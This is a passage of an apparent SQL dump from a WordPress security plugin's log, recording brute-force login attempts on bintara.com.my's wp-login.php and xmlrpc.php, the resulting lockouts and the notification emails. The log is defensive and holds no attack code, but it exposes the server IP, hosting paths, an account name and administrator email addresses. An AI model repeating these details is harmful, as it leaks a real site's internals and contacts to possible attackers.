empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiBTDrcQxTmGrCWuaQrgAAAcg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"52706\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiBTDrcQxTmGrCWuaQrgAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071621.9936\";s:12:\"REQUEST_TIME\";s:10:\"1569071621\";}}','notice','2019-09-21 13:13:43','2019-09-21 13:13:42',17798248,19282648,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(25818,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:13:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:13:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:28:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:28:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:13:43','2019-09-21 13:13:42',17882128,19282648,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(25819,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:13:43','2019-09-21 13:13:42',18087776,19282648,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(25820,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiCViJ7D9Gn7wDPh8gWwAAAMQ\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"53424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiCViJ7D9Gn7wDPh8gWwAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071625.4883\";s:12:\"REQUEST_TIME\";s:10:\"1569071625\";}}','notice','2019-09-21 13:13:46','2019-09-21 13:13:45',18314528,19611952,'https://bintara.com.my/wp/xmlrpc.php',1,0,'157.230.92.254'),(25821,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiMFiJ7D9Gn7wDPh8gZwAAAM0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"165.227.182.180\";s:11:\"REMOTE_PORT\";s:5:\"54824\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiMFiJ7D9Gn7wDPh8gZwAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071665.0297\";s:12:\"REQUEST_TIME\";s:10:\"1569071665\";}}','notice','2019-09-21 13:14:26','2019-09-21 13:14:25',17800544,19285984,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.227.182.180'),(25822,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:14:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:14:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:29:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:29:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:14:26','2019-09-21 13:14:25',17884976,19285984,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.227.182.180'),(25823,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:14:26','2019-09-21 13:14:25',18090576,19285984,'https://bintara.com.my/wordpress/wp-login.php',1,0,'165.227.182.180'),(25824,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiM7fBTP0kPOVnb8jt6AAAAFU\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"165.227.182.180\";s:11:\"REMOTE_PORT\";s:5:\"55334\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiM7fBTP0kPOVnb8jt6AAAAFU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071667.6132\";s:12:\"REQUEST_TIME\";s:10:\"1569071667\";}}','notice','2019-09-21 13:14:29','2019-09-21 13:14:27',18313704,19610384,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'165.227.182.180'),(25825,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiPLfBTP0kPOVnb8jt6gAAAEk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.232.21\";s:11:\"REMOTE_PORT\";s:5:\"43256\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiPLfBTP0kPOVnb8jt6gAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071676.3299\";s:12:\"REQUEST_TIME\";s:10:\"1569071676\";}}','notice','2019-09-21 13:14:37','2019-09-21 13:14:36',17799472,19289272,'https://bintara.com.my/2019/wp-login.php',1,0,'97.74.232.21'),(25826,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:14:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:14:36\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:29:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:29:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:14:37','2019-09-21 13:14:36',17884472,19289272,'https://bintara.com.my/2019/wp-login.php',1,0,'97.74.232.21'),(25827,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:14:37','2019-09-21 13:14:36',18090320,19289272,'https://bintara.com.my/2019/wp-login.php',1,0,'97.74.232.21'),(25828,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYiPjDrcQxTmGrCWuaQvgAAAc4\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.232.21\";s:11:\"REMOTE_PORT\";s:5:\"43748\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYiPjDrcQxTmGrCWuaQvgAAAc4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071678.8553\";s:12:\"REQUEST_TIME\";s:10:\"1569071678\";}}','notice','2019-09-21 13:14:40','2019-09-21 13:14:39',18314632,19610824,'https://bintara.com.my/2019/xmlrpc.php',1,0,'97.74.232.21'),(25829,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:14:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:14:39\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:29:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:29:39\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 13:14:40','2019-09-21 13:14:39',18394728,19610824,'https://bintara.com.my/2019/xmlrpc.php',1,0,'97.74.232.21'),(25830,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:14:40','2019-09-21 13:14:39',18602296,19610824,'https://bintara.com.my/2019/xmlrpc.php',1,0,'97.74.232.21'),(25831,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 